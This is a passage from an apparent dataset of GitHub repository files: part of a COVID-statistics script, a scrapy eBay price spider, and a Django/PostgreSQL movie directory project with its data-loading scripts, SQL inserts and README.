updates: Last update took place on \"+r[0])\n update()\nelse:\n print(\"Please wait for the COVID cases data to be acquired...\")\n generate()\nif os.path.exists(\"ghs.csv\"):\n ghs=pd.read_csv(\"ghs.csv\")\nelse:\n print(\"Please wait for the Global Health Security Index data to be acquired\")\n acquire_ghs()\n ghs=pd.read_csv(\"ghs.csv\")\nghs_c=list(ghs[\"Country\"])\nfor a in range(len(ghs_c)):\n if ghs_c[a]==\"Czech Republic\":\n ghs_c[a]=\"Czechia\"\n elif ghs_c[a]==\"Congo Democratic Republic\":\n ghs_c[a]=\"Congo (Kinshasa)\"\n elif ghs_c[a]==\"Congo Brazzaville\":\n ghs_c[a]=\"Congo (Brazzaville)\"\n elif ghs_c[a]==\"Myanmar\":\n ghs_c[a]=\"Burma\"\n elif ghs_c[a]==\"Côte d’Ivoire\":\n ghs_c[a]=\"Cote d'Ivoire\"\n elif ghs_c[a]==\"Eswatini (Swaziland)\":\n ghs_c[a]=\"Swaziland\"\n elif ghs_c[a]==\"Guinea Bissau\":\n ghs_c[a]=\"Guinea-Bissau\"\n elif ghs_c[a]==\"Kyrgyz Republic\":\n ghs_c[a]=\"Kyrgyzstan\"\n elif ghs_c[a]==\"São Tomé and Príncipe\":\n ghs_c[a]=\"Sao Tome and Principe\"\n elif ghs_c[a]==\"St Kitts and Nevis\":\n ghs_c[a]=\"Saint Kitts and Nevis\"\n elif ghs_c[a]==\"St Lucia\":\n ghs_c[a]=\"Saint Lucia\"\n elif ghs_c[a]==\"St Vincent and The Grenadines\":\n ghs_c[a]=\"Saint Vincent and the Grenadines\"\n elif ghs_c[a]==\"Timor Leste\":\n ghs_c[a]=\"Timor-Leste\"\nghs.index=ghs_c\ndel ghs[\"Country\"]\nprint(\"Loading graphical interface\")\nsetup_GUI()\nglobal active\nglobal confirmed\nglobal recovered\nglobal deaths\nactive=pd.read_excel(\"data.xlsx\",sheet_name=\"Active\")\nconfirmed=pd.read_excel(\"data.xlsx\",sheet_name=\"Confirmed\")\nrecovered=pd.read_excel(\"data.xlsx\",sheet_name=\"Recovered\")\ndeaths=pd.read_excel(\"data.xlsx\",sheet_name=\"Deaths\")\nactive.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nconfirmed.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nrecovered.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\ndeaths.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nactive.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\nrecovered.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\nconfirmed.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\ndeaths.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\ncountries=list(active.columns)[1:]\ncountry_rf=pd.DataFrame(index=countries,columns=[\"rf\"])\nif not os.path.exists(\"life_exp.csv\"):\n get_exp()\nlife=pd.read_csv(\"life_exp.csv\")\nlife_c=list(life[\"Country\"])\ndel life[\"Country\"]\nfor a in range(len(life_c)):\n if life_c[a]==\"Côte d'Ivoire\":\n life_c[a]=\"Cote d'Ivoire\"\n elif life_c[a]==\"DR Congo\":\n life_c[a]=\"Congo (Kinshasa)\"\n elif life_c[a]==\"Czech Republic (Czechia)\":\n life_c[a]=\"Czechia\"\n elif life_c[a]==\"Congo\":\n life_c[a]=\"Congo (Brazzaville)\"\n elif life_c[a]==\"St. Vincent & Grenadines\":\n life_c[a]=\"Saint Vincent and the Grenadines\"\n elif life_c[a]==\"Sao Tome & Principe\":\n life_c[a]=\"Sao Tome and Principe\"\n elif life_c[a]==\"Myanmar\":\n life_c[a]=\"Burma\"\n elif life_c[a]==\"Eswatini\":\n life_c[a]=\"Swaziland\"\nlife.index=life_c\nfor country in countries:\n cases=list(active[country])\n start=0\n while start<len(cases) and cases[start]==0:\n start+=1\n end=cases.index(max(cases))-start\n start=max(1,start)\n end=max(end,0)\n country_rf.at[country,\"rf\"]=end\n" } ]
6
ReggieYang/webCrawler
https://github.com/ReggieYang/webCrawler
7102c0580601e30943bd7ff0b49dcffcece194d4
e9d8682b7f68da90b54e49e972179100f7305dae
64a96118ebbe0430bc64137540ad2f3f54b5f694
refs/heads/master
2020-09-22T10:52:15.855090
2017-11-03T16:49:01
2017-11-03T16:49:01
66,719,504
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6291457414627075, "alphanum_fraction": 0.635175883769989, "avg_line_length": 32.16666793823242, "blob_id": "b2424f8ba0537ed7a49066400b443f529dd403bb", "content_id": "2bb1c8925bd6cb746df0dfea34347e39bc8ee765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 102, "num_lines": 30, "path": "/mySpider/spiders/ebay_item.py", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "import scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\n\n\nclass DmozSpider(scrapy.spiders.Spider):\n name = \"ebay_item\"\n allowed_domains = [\"ebay.com\"]\n start_urls = []\n url_prefix = \"http://www.ebay.com/itm/\"\n # rules = [Rule(LinkExtractor(allow=['/tor/\\d+']), 'parse')]\n\n file_object = open('/Users/kaimaoyang/PycharmProjects/webCrawler/mySpider/spiders/itemList', 'rb')\n\n for line in file_object:\n start_urls.append(url_prefix + str(line, encoding=\"utf-8\")[:-1])\n\n def parse(self, response):\n item = EbayItem()\n price = response.xpath('//span[@id=\\'prcIsum\\']//@content').extract()[0]\n item['price'] = price\n item['itemId'] = str(response.url)[-12:]\n item['test'] = response.xpath('//span[@id=\\'prcIsum\\']/text()').extract()[0]\n return item\n\n\nclass EbayItem(scrapy.Item):\n price = scrapy.Field()\n itemId = scrapy.Field()\n test = scrapy.Field()\n" }, { "alpha_fraction": 0.7213114500045776, "alphanum_fraction": 0.7213114500045776, "avg_line_length": 12.55555534362793, "blob_id": "d0745d5f7fb3237e3251dc5d6c874c4fea99a237", "content_id": "28c98fb82a1e1abd522d4658b73a7c6646cbb1f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 122, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/README.md", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "# webCrawler\n\n## Usage:\n\nscrapy crawl ebay_item -o $outputPath -t csv\n\nThe inputPath is in ebay_item.py\n\nBased on scrapy.\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 14, "blob_id": "7ad0cbc244878ede6f6a36d7b546fb4db8186fe1", "content_id": "73c585f1ca0f9707b84a90fa60b9662caad5daff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/mySpider/spiders/myItem.py", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "import scrapy\n\n\nclass TorrentItem(scrapy.Item):\n price = scrapy.Field()\n" } ]
3
shashwatblack/justmovies
https://github.com/shashwatblack/justmovies
53c3b9a3f598312dc327cdd30f11faf35cebf816
fa17a520a1c94d08f7baf1f4f3d6418ad2ac3614
a76d52253fa2055a76d5cec123a90728b7784832
refs/heads/master
2020-04-10T20:00:30.977750
2018-12-11T00:38:15
2018-12-11T00:38:15
161,254,113
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47753217816352844, "alphanum_fraction": 0.4855477213859558, "avg_line_length": 39.36274337768555, "blob_id": "d83900b44ce6d07f6018d1b16dd919b7834eca7e", "content_id": "70388c5f829a7d47e85e2befe646a28d99f1e091", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4117, "license_type": "no_license", "max_line_length": 95, "num_lines": 102, "path": "/data/jumbo_load.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport ast\nimport sys\nimport os.path\nfrom utils.db_utils import DatabaseUtils, MockCursor\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\n\ndef jumbo_load():\n count = 0\n max_count = 10000\n db_utils = DatabaseUtils()\n with open(\"movies.csv\", errors='ignore') as f1:\n with open(\"movies_with_omdb.csv\", errors='ignore') as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for basic, omdb_row in rows:\n omdb = ast.literal_eval(omdb_row[2])\n if omdb[\"Response\"] == \"False\":\n continue\n # we have a clean 'row'\n\n # PEOPLE\n director = basic[3]\n actor = basic[11]\n writer = basic[13]\n\n db_director = db_utils.get_person(director)\n db_actor = db_utils.get_person(actor)\n db_writer = db_utils.get_person(writer)\n\n if not db_director:\n db_director = db_utils.insert_then_get_person(director)\n if not db_actor:\n db_actor = db_utils.insert_then_get_person(actor)\n if not db_writer:\n db_writer = db_utils.insert_then_get_person(writer)\n\n # ROLES\n director_role = db_utils.get_personal_role(db_director, \"Director\")\n actor_role = db_utils.get_personal_role(db_actor, \"Actor\")\n writer_role = db_utils.get_personal_role(db_writer, \"Writer\")\n\n if not director_role:\n db_utils.insert_role(db_director, \"Director\")\n if not actor_role:\n db_utils.insert_role(db_actor, \"Actor\")\n if not writer_role:\n db_utils.insert_role(db_writer, \"Writer\")\n\n # MOVIE\n title = basic[6]\n year = basic[14]\n movie = db_utils.get_movie(title, year)\n genre = db_utils.get_genre(basic[4])\n mpaa_rating = db_utils.get_mpaa_rating(basic[7])\n country = db_utils.get_country(basic[2])\n language = db_utils.get_language(omdb[\"Language\"].split(',')[0].strip())\n if not movie:\n movie = db_utils.insert_then_get_movie(title, year, {\n \"company\": basic[1],\n \"budget\": basic[0],\n \"gross\": basic[5],\n \"released\": basic[8],\n \"runtime\": basic[9],\n \"plot\": omdb[\"Plot\"],\n \"awards\": omdb[\"Awards\"],\n \"poster\": omdb[\"Poster\"],\n \"website\": omdb[\"Website\"],\n \"imdb_rating\": omdb[\"imdbRating\"],\n \"imdb_id\": omdb[\"imdbID\"],\n \"genre\": genre[0] if genre else None,\n \"rating\": mpaa_rating[0] if mpaa_rating else None,\n \"country\": country[0] if country else None,\n \"language\": language[0] if language else None\n })\n\n # INVOLVEMENT\n director_involvement = db_utils.get_involvement(db_director, movie, \"Director\")\n actor_involvement = db_utils.get_involvement(db_actor, movie, \"Actor\")\n writer_involvement = db_utils.get_involvement(db_writer, movie, \"Writer\")\n\n if not director_involvement:\n db_utils.insert_involvement(db_director, movie, \"Director\")\n\n if not actor_involvement:\n db_utils.insert_involvement(db_actor, movie, \"Actor\")\n\n if not writer_involvement:\n db_utils.insert_involvement(db_writer, movie, \"Writer\")\n\n db_utils.commit()\n\n count += 1\n print(\"DONE \" + str(count))\n if count >= max_count:\n break\n\n\nif __name__ == \"__main__\":\n jumbo_load(MockCursor())\n" }, { "alpha_fraction": 0.43520089983940125, "alphanum_fraction": 0.44538766145706177, "avg_line_length": 28.450000762939453, "blob_id": "7a1ca6282412d3cc3ad03e4c07a8baf07ac42ce7", "content_id": "13c78fc57a981d1a39314bdbba31652ccd93a9ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/data/omdb_fetch.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport requests\n\nomdb_url = \"http://www.omdbapi.com/\"\n\n\nclass OmdbKey:\n keys = []\n current_key_index = None\n\n def load_keys(self):\n with open('omdb_keys.txt') as keysfile:\n keys = keysfile.readlines()\n\n self.keys = [{\n \"key\": k.strip(),\n \"used\": 0\n } for k in keys]\n self.current_key_index = 0\n\n def get_key(self):\n if not self.keys:\n return None\n current_key = self.keys[self.current_key_index]\n return current_key[\"key\"]\n\n def next(self):\n self.current_key_index += 1\n print(\"----------------------------------------------------------------\")\n print(\"switched key to \", self.current_key_index)\n print(\"----------------------------------------------------------------\")\n\n\nomdb_key = OmdbKey()\nomdb_key.load_keys()\n\nwith open('movies_with_omdb.csv', mode='w', newline='') as export_file:\n writer = csv.writer(export_file)\n with open('movies.csv') as csvfile:\n reader = csv.reader(csvfile)\n headers = next(reader)\n writer.writerow([\"title\",\"year\",\"omdb_data\"])\n\n count = 0\n for row in reader:\n while True:\n print(\"FETCHING\", row[6], row[14])\n r = requests.get(omdb_url, params={\n \"t\": row[6],\n \"y\": row[14],\n \"apikey\": omdb_key.get_key()\n })\n if r.status_code == 200:\n row.append(r.json())\n writer.writerow([row[6],row[14],r.json()])\n count += 1\n print(\"DONE \", count, r.status_code, row[6])\n break\n else:\n omdb_key.next()\n" }, { "alpha_fraction": 0.70188969373703, "alphanum_fraction": 0.7024039030075073, "avg_line_length": 50.17763137817383, "blob_id": "39784f675b8013bb8451f698f55e5d0327a4b61f", "content_id": "f7873c3817cab46a757f42e4287c26937bed74f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 7779, "license_type": "no_license", "max_line_length": 64, "num_lines": 152, "path": "/data/languages.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO language (\"name\") VALUES ('Aboriginal');\nINSERT INTO language (\"name\") VALUES ('Acholi');\nINSERT INTO language (\"name\") VALUES ('Afrikaans');\nINSERT INTO language (\"name\") VALUES ('Akan');\nINSERT INTO language (\"name\") VALUES ('Albanian');\nINSERT INTO language (\"name\") VALUES ('Algonquin');\nINSERT INTO language (\"name\") VALUES ('American Sign Language');\nINSERT INTO language (\"name\") VALUES ('Ancient (to 1453)');\nINSERT INTO language (\"name\") VALUES ('Apache languages');\nINSERT INTO language (\"name\") VALUES ('Arabic');\nINSERT INTO language (\"name\") VALUES ('Aramaic');\nINSERT INTO language (\"name\") VALUES ('Armenian');\nINSERT INTO language (\"name\") VALUES ('Assyrian Neo-Aramaic');\nINSERT INTO language (\"name\") VALUES ('Awadhi');\nINSERT INTO language (\"name\") VALUES ('Azerbaijani');\nINSERT INTO language (\"name\") VALUES ('Bambara');\nINSERT INTO language (\"name\") VALUES ('Belarusian');\nINSERT INTO language (\"name\") VALUES ('Bengali');\nINSERT INTO language (\"name\") VALUES ('Berber languages');\nINSERT INTO language (\"name\") VALUES ('Bosnian');\nINSERT INTO language (\"name\") VALUES ('British Sign Language');\nINSERT INTO language (\"name\") VALUES ('Bulgarian');\nINSERT INTO language (\"name\") VALUES ('Cantonese');\nINSERT INTO language (\"name\") VALUES ('Catalan');\nINSERT INTO language (\"name\") VALUES ('Chinese');\nINSERT INTO language (\"name\") VALUES ('Cornish');\nINSERT INTO language (\"name\") VALUES ('Corsican');\nINSERT INTO language (\"name\") VALUES ('Cree');\nINSERT INTO language (\"name\") VALUES ('Croatian');\nINSERT INTO language (\"name\") VALUES ('Czech');\nINSERT INTO language (\"name\") VALUES ('Danish');\nINSERT INTO language (\"name\") VALUES ('Dari');\nINSERT INTO language (\"name\") VALUES ('Dutch');\nINSERT INTO language (\"name\") VALUES ('Eastern Frisian');\nINSERT INTO language (\"name\") VALUES ('Egyptian (Ancient)');\nINSERT INTO language (\"name\") VALUES ('English');\nINSERT INTO language (\"name\") VALUES ('Esperanto');\nINSERT INTO language (\"name\") VALUES ('Estonian');\nINSERT INTO language (\"name\") VALUES ('Filipino');\nINSERT INTO language (\"name\") VALUES ('Finnish');\nINSERT INTO language (\"name\") VALUES ('Flemish');\nINSERT INTO language (\"name\") VALUES ('French');\nINSERT INTO language (\"name\") VALUES ('French Sign Language');\nINSERT INTO language (\"name\") VALUES ('Gallegan');\nINSERT INTO language (\"name\") VALUES ('Georgian');\nINSERT INTO language (\"name\") VALUES ('German');\nINSERT INTO language (\"name\") VALUES ('Greek');\nINSERT INTO language (\"name\") VALUES ('Greenlandic');\nINSERT INTO language (\"name\") VALUES ('Guarani');\nINSERT INTO language (\"name\") VALUES ('Gujarati');\nINSERT INTO language (\"name\") VALUES ('Hakka');\nINSERT INTO language (\"name\") VALUES ('Hawaiian');\nINSERT INTO language (\"name\") VALUES ('Hebrew');\nINSERT INTO language (\"name\") VALUES ('Hindi');\nINSERT INTO language (\"name\") VALUES ('Hmong');\nINSERT INTO language (\"name\") VALUES ('Hokkien');\nINSERT INTO language (\"name\") VALUES ('Hungarian');\nINSERT INTO language (\"name\") VALUES ('Ibo');\nINSERT INTO language (\"name\") VALUES ('Icelandic');\nINSERT INTO language (\"name\") VALUES ('Indonesian');\nINSERT INTO language (\"name\") VALUES ('Inuktitut');\nINSERT INTO language (\"name\") VALUES ('Irish');\nINSERT INTO language (\"name\") VALUES ('Italian');\nINSERT INTO language (\"name\") VALUES ('Japanese');\nINSERT INTO language (\"name\") VALUES ('Japanese Sign Language');\nINSERT INTO language (\"name\") VALUES ('Khmer');\nINSERT INTO language (\"name\") VALUES ('Kirundi');\nINSERT INTO language (\"name\") VALUES ('Klingon');\nINSERT INTO language (\"name\") VALUES ('Korean');\nINSERT INTO language (\"name\") VALUES ('Korean Sign Language');\nINSERT INTO language (\"name\") VALUES ('Kurdish');\nINSERT INTO language (\"name\") VALUES ('Ladino');\nINSERT INTO language (\"name\") VALUES ('Lao');\nINSERT INTO language (\"name\") VALUES ('Latin');\nINSERT INTO language (\"name\") VALUES ('Lingala');\nINSERT INTO language (\"name\") VALUES ('Luxembourgish');\nINSERT INTO language (\"name\") VALUES ('Macedonian');\nINSERT INTO language (\"name\") VALUES ('Malay');\nINSERT INTO language (\"name\") VALUES ('Malinka');\nINSERT INTO language (\"name\") VALUES ('Mandarin');\nINSERT INTO language (\"name\") VALUES ('Maori');\nINSERT INTO language (\"name\") VALUES ('Mapudungun');\nINSERT INTO language (\"name\") VALUES ('Maya');\nINSERT INTO language (\"name\") VALUES ('Mende');\nINSERT INTO language (\"name\") VALUES ('Min Nan');\nINSERT INTO language (\"name\") VALUES ('Mohawk');\nINSERT INTO language (\"name\") VALUES ('Mongolian');\nINSERT INTO language (\"name\") VALUES ('N/A');\nINSERT INTO language (\"name\") VALUES ('Navajo');\nINSERT INTO language (\"name\") VALUES ('Neapolitan');\nINSERT INTO language (\"name\") VALUES ('None');\nINSERT INTO language (\"name\") VALUES ('Norse');\nINSERT INTO language (\"name\") VALUES ('North American Indian');\nINSERT INTO language (\"name\") VALUES ('Norwegian');\nINSERT INTO language (\"name\") VALUES ('Occitan');\nINSERT INTO language (\"name\") VALUES ('Ojibwa');\nINSERT INTO language (\"name\") VALUES ('Old');\nINSERT INTO language (\"name\") VALUES ('Old English');\nINSERT INTO language (\"name\") VALUES ('Panjabi');\nINSERT INTO language (\"name\") VALUES ('Papiamento');\nINSERT INTO language (\"name\") VALUES ('Pawnee');\nINSERT INTO language (\"name\") VALUES ('Persian');\nINSERT INTO language (\"name\") VALUES ('Polish');\nINSERT INTO language (\"name\") VALUES ('Portuguese');\nINSERT INTO language (\"name\") VALUES ('Punjabi');\nINSERT INTO language (\"name\") VALUES ('Pushto');\nINSERT INTO language (\"name\") VALUES ('Quechua');\nINSERT INTO language (\"name\") VALUES ('Quenya');\nINSERT INTO language (\"name\") VALUES ('Rajasthani');\nINSERT INTO language (\"name\") VALUES ('Romanian');\nINSERT INTO language (\"name\") VALUES ('Romany');\nINSERT INTO language (\"name\") VALUES ('Russian');\nINSERT INTO language (\"name\") VALUES ('Saami');\nINSERT INTO language (\"name\") VALUES ('Sanskrit');\nINSERT INTO language (\"name\") VALUES ('Scanian');\nINSERT INTO language (\"name\") VALUES ('Scots');\nINSERT INTO language (\"name\") VALUES ('Scottish Gaelic');\nINSERT INTO language (\"name\") VALUES ('Serbian');\nINSERT INTO language (\"name\") VALUES ('Serbo-Croatian');\nINSERT INTO language (\"name\") VALUES ('Shanghainese');\nINSERT INTO language (\"name\") VALUES ('Sicilian');\nINSERT INTO language (\"name\") VALUES ('Sign Languages');\nINSERT INTO language (\"name\") VALUES ('Sindarin');\nINSERT INTO language (\"name\") VALUES ('Sioux');\nINSERT INTO language (\"name\") VALUES ('Slovak');\nINSERT INTO language (\"name\") VALUES ('Somali');\nINSERT INTO language (\"name\") VALUES ('Southern Sotho');\nINSERT INTO language (\"name\") VALUES ('Spanish');\nINSERT INTO language (\"name\") VALUES ('Spanish Sign Language');\nINSERT INTO language (\"name\") VALUES ('Swahili');\nINSERT INTO language (\"name\") VALUES ('Swedish');\nINSERT INTO language (\"name\") VALUES ('Swiss German');\nINSERT INTO language (\"name\") VALUES ('Syriac');\nINSERT INTO language (\"name\") VALUES ('Tagalog');\nINSERT INTO language (\"name\") VALUES ('Tamil');\nINSERT INTO language (\"name\") VALUES ('Telugu');\nINSERT INTO language (\"name\") VALUES ('Thai');\nINSERT INTO language (\"name\") VALUES ('Tibetan');\nINSERT INTO language (\"name\") VALUES ('Tok Pisin');\nINSERT INTO language (\"name\") VALUES ('Tonga');\nINSERT INTO language (\"name\") VALUES ('Tswana');\nINSERT INTO language (\"name\") VALUES ('Tupi');\nINSERT INTO language (\"name\") VALUES ('Turkish');\nINSERT INTO language (\"name\") VALUES ('Ukrainian');\nINSERT INTO language (\"name\") VALUES ('Ungwatsi');\nINSERT INTO language (\"name\") VALUES ('Urdu');\nINSERT INTO language (\"name\") VALUES ('Vietnamese');\nINSERT INTO language (\"name\") VALUES ('Welsh');\nINSERT INTO language (\"name\") VALUES ('Wolof');\nINSERT INTO language (\"name\") VALUES ('Xhosa');\nINSERT INTO language (\"name\") VALUES ('Yiddish');\nINSERT INTO language (\"name\") VALUES ('Zulu');\n" }, { "alpha_fraction": 0.713185727596283, "alphanum_fraction": 0.713185727596283, "avg_line_length": 24.341463088989258, "blob_id": "6f248cfb7731d38ef67ed5eec9d6323042083037", "content_id": "33264e18106689f1c3f0e147a3dab32f115bbe93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1039, "license_type": "no_license", "max_line_length": 85, "num_lines": 41, "path": "/data/data_load.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import os.path, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\nfrom utils.db_utils import DatabaseUtils\nfrom jumbo_load import jumbo_load\n\n# connection to the database\ndb_utils = DatabaseUtils()\nconnection = db_utils.get_connection()\ncursor = db_utils.get_cursor()\n\n# LET'S FIRST CREATE THE SCHEMA\nprint('creating schemas..')\ncursor.execute(open(\"schema.sql\", \"r\").read())\ndb_utils.commit()\n\n# NOW WE'LL ADD THE DATA\nprint('inserting countries..')\ncursor.execute(open(\"countries.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting ratings..')\ncursor.execute(open(\"ratings.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting languages..')\ncursor.execute(open(\"languages.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting genres..')\ncursor.execute(open(\"genres.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting movies, people and roles...')\njumbo_load()\n\nprint('running custom queries..')\ncursor.execute(open(\"custom_queries.sql\", \"r\").read())\ndb_utils.commit()\n\nprint(\"ALL DONE!\")\n" }, { "alpha_fraction": 0.734393835067749, "alphanum_fraction": 0.7488551735877991, "avg_line_length": 43.6129035949707, "blob_id": "c535f4795995c046870a63afcfab8dd264633a79", "content_id": "018886997b078d09e756308769a9827542bbd162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4149, "license_type": "no_license", "max_line_length": 195, "num_lines": 93, "path": "/README.md", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "\n# JUST MOVIES\n\n## What is it?\n\nJust Movies is a simple movie and celebrity directory. The cherry on the cake is the `data` feature, which runs analytical queries on the available data set and presents them in beautiful charts.\n\nThis work is done as a course project for Database Systems (TAMU CSCE 608). The author is Shashwat Shashi Mehta. UIN: **827008698**\n\n## What are its features?\n 1. Just Movies\n\t- Grid of movie posters and names\n\t- Paginated 20 per page\n\t- Ability to apply following filters\n\t\t- Title (supports substring search)\n\t\t- Company (supports substring search)\n\t\t- Year (supports ranges `from`-`to`)\n\t\t- IMDB Rating\n\t- Link to IMDB page under each movie poster\n\t- Link to edit page\n 2. Just People\n\t- Search any celebrity by their name (supports substring search)\n\t- Will show data for the best match\n\t- Date of Birth, Roles, Introduction, and Filmography\n 3. Just Data\n\t- Lots of beautiful and insightful charts\n\t- General bird's-eye view stats\n\t\t- Total # of movies in system\n\t\t- Total # of celebrities in system\n\t\t- Total budget of all movies\n\t\t- Total reviews received (Note: `Reviews` feature hasn't been developed yet)\n\t- Pie Charts\n\t\t- Movie count distribution by genre\n\t\t- Movie count distribution by country\n\t\t- Movie count distribution by language\n\t\t- Movie budget distribution by genre\n\t\t- Movie budget distribution by country\n\t\t- Movie budget distribution by language\n\t- Budgets by year\n\t - Bar graph showing the total budget pattern from year to year\n\t- Celebrity Stats\n\t\t- Top 10 celebrities involved in at least 10 movies.\n\t\t\t- The ranking is based on average imdb rating for each of the movies they worked in.\n\t\t- Celebrity Role Distribution Venn Diagram\n\t\t\t- How many actors+writers are there?\n\t\t\t- Is writer+director role more common than actor+director?\n 4. Movie Edit\n\t- Edit any of the movie's fields\n\t- Fixed fields are provided as select dropdown\n\t- Ability to delete the movie entirely from the system.\n\t\t- This will also delete all the associated celebrity involvements and reviews from the system.\n\n## How was the data collected?\n 1. The initial data was downloaded from kaggle - https://www.kaggle.com/danielgrijalvas/movies\n 2. Additional data, such as posters, imdb id and so on were fetched using the OMDB API - omdbapi.com\n 3. A python script `omdb_fetch.py` was written to fetch data in batches over a period of few days (due to API limitations).\n 4. All the data was collected in two CSVs - `data/movies.csv` and `data/movies_with_omdb.csv`\n 5. Further tests were written to verify the consistency of the data.\n 6. Finally fixed values like `country`, `language`, and `genre` was extracted and SQL insert scripts were created for these.\n 7. For remaining tables, another script `data/jumbo_load.py` was written to run over the CSVs and insert everything into the database directly.\n\n## What technologies does it use?\n 1. PostgreSQL\n 2. Django\n 3. psycopg2\n 4. HTML\n 5. JavaScript\n 6. charts.js\n 7. d3.js\n 8. venn.js\n 9. Bootflat\n 10. CSS\n\n## How to set it up?\n1. `git clone https://github.tamu.edu/sswt/justmovies.git`\n2. `cd path/to/project`\n3. create `virtualenv` if you want. Recommended!!\n4. Install requirements with `pip install -r requirements.txt`\n5. Now create a fresh database in postgres.\n6. Add its credentials to `utils/credentials.py`\n7. Run `data/data_load.py`. This will take around 2 minutes to complete. If everything goes well, you will have the complete database after it ends.\n8. Alternatively, you can load data into postgres directly using the `data/dump.sql` pg_dump.\n9. Migrate `python manage.py migrate`. Although the application logic uses postgres, Django uses sqlite here. I did not change this because in a course project, I want to keep these separate.\n10. Start up the server `python manage.py runserver`\n\n## Screenshots\n![Movies Listing](https://i.imgur.com/oH94zgo.png)\n![Individual Celebrity Page](https://i.imgur.com/y0Tq5Yq.png)\n![Data Page](https://i.imgur.com/xTF76jy.png)\n![Edit Movie Page](https://i.imgur.com/jpQjzjI.png)\n\n## How to reach me if there's some issue?\nIf you have access, create an issue in this repo.\nOtherwise send me an email at sswt at tamu dot edu." }, { "alpha_fraction": 0.6394315958023071, "alphanum_fraction": 0.6536412239074707, "avg_line_length": 42.30769348144531, "blob_id": "59b997aaed755cf803c646da809e0edf53c0737a", "content_id": "1b1af3a4c1f143fe04c85a7478b88cfae6bef082", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 563, "license_type": "no_license", "max_line_length": 70, "num_lines": 13, "path": "/data/ratings.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO rating (\"name\") VALUES ('B');\nINSERT INTO rating (\"name\") VALUES ('B15');\nINSERT INTO rating (\"name\") VALUES ('G');\nINSERT INTO rating (\"name\") VALUES ('NC-17');\nINSERT INTO rating (\"name\") VALUES ('PG');\nINSERT INTO rating (\"name\") VALUES ('PG-13');\nINSERT INTO rating (\"name\") VALUES ('R');\nINSERT INTO rating (\"name\") VALUES ('TV-14');\nINSERT INTO rating (\"name\") VALUES ('TV-MA');\nINSERT INTO rating (\"name\") VALUES ('TV-PG');\nINSERT INTO rating (\"name\") VALUES ('UNRATED');\n\n-- ['N/A', 'NOT RATED', 'Not specified'] are all replaced with UNRATED\n" }, { "alpha_fraction": 0.5137839317321777, "alphanum_fraction": 0.5277901291847229, "avg_line_length": 35.87704849243164, "blob_id": "1af6d8c999ef65195ad20637f33594612dca0d77", "content_id": "8a15947549794a731e2cd5ff5bb0856ab105b398", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4498, "license_type": "no_license", "max_line_length": 97, "num_lines": 122, "path": "/data/data_scrub.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport ast\n\ndef test_omdb_data_integrity():\n count_rows = 0\n count_movie_okay = 0\n count_movie_not_found = 0\n with open(\"movies_with_omdb.csv\") as f:\n reader = csv.reader(f)\n headers = next(reader)\n for row in reader:\n assert(len(row) == 3)\n omdb_data = ast.literal_eval(row[2])\n count_rows += 1\n if omdb_data[\"Response\"] == \"True\":\n assert(len(omdb_data.keys()) == 25)\n count_movie_okay += 1\n else:\n assert(omdb_data[\"Error\"] == \"Movie not found!\")\n 